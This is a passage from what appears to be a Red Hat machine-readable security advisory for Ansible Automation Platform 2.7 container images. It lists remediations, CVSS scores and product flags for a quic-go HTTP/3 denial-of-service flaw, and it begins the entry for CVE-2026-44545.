"url": "https://github.com/quic-go/quic-go/security/advisories/GHSA-vvgj-x9jq-8cj9"
}
],
"release_date": "2026-06-04T17:43:36.803000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/quic-go/quic-go: quic-go: Denial of Service via excessive memory allocation in HTTP/3 trailers"
},
{
"cve": "CVE-2026-44545",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-03T15:01:49.007231+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
